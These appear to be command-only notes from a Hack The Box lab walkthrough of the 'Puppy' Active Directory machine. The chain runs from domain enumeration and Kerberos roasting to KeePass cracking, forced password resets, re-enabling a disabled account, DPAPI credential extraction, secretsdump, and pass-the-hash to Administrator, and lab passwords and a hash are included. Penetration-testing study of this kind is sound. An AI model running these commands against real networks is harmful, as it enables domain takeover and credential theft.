Select a result to preview

Puppy

levi.james / KingofAkron2025!

nxc smb 10.10.11.70

dnsrecon -a -n 10.10.11.70 -d puppy.htb

ldapdomaindump -u 'puppy.htb\levi.james' -p 'KingofAkron2025!' 10.10.11.70

netexec smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' -d puppy.htb --shares

rpcclient -U 'levi.james%KingofAkron2025!' 10.10.11.70 -c "enumdomusers" | tr '[]' ' '| awk '{print $2}' > users.txt

impacket-GetNPUsers puppy.htb/ -no-pass -usersfile users.txt

impacket-GetUserSPNs puppy.htb/levi.james:'KingofAkron2025!'  -request

Nos añadimos al grupo DEVELOPERS

bloodyAD --host 10.10.11.70 -d DC.puppy.htb -u levi.james -p 'KingofAkron2025!'  add groupMember 'DEVELOPERS' 'levi.james'

smbclient //10.10.11.70/DEV -U 'levi.james'%'KingofAkron2025!'  

/opt/john/run/keepass2john recovery.kdbx > hash.txt

sudo /opt/john/run/john hash_fixed.txt --wordlist=/usr/share/wordlists/rockyou.txt

liverpool

ant.edwards : Antman2025!

rpcclient -U 'ant.edwards%Antman2025!' 10.10.11.70

setuserinfo2 adam.silver 23 'Pa$$w0rd123'

netexec smb 10.10.11.70 -u 'adam.silver' -p 'Pa$$w0rd123' -d puppy.htb
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [-] puppy.htb\adam.silver:Pa$$w0rd123 STATUS_ACCOUNT_DISABLED

Para habilitar la cuenta

bloodyAD --host DC.puppy.htb -d puppy.htb -u ant.edwards -p 'Antman2025!' remove uac 'adam.silver' -f ACCOUNTDISABLE

evil-winrm -i 10.10.11.70 -u adam.silver -p 'Pa$$w0rd123'

download site-backup-2024-12-30.zip

steph.cooper : ChefSteph2025!

impacket-smbserver share ./share -smb2support

cd C:\users\USER\appdata\roaming\microsoft\credentials
download C4BB96844A5C9DD45D5B6A9859252BA6
cd C:\Users\USER\AppData\Roaming\Microsoft\Protect

impacket-dpapi masterkey -file C4BB96844A5C9DD45D5B6A9859252BA6 -password 'PASS' -sid SID

impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

$path = "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"
[Convert]::ToBase64StringReadAllBytes($path) | Out-File -Encoding ASCII 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
download 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
base64 -d out.txt > masterkey.blob

impacket-dpapi masterkey -file masterkey.blob -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107

$path = "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9"
[Convert]::ToBase64StringReadAllBytes($path) | Out-File -Encoding ASCII 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
download 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
base64 -d out.txt > credential.blob

impacket-dpapi credential -file credential.blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

impacket-secretsdump puppy.htb/steph.cooper_adm:'FivethChipOnItsWay2025!'@10.10.11.70

evil-winrm -i 10.10.11.70 -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'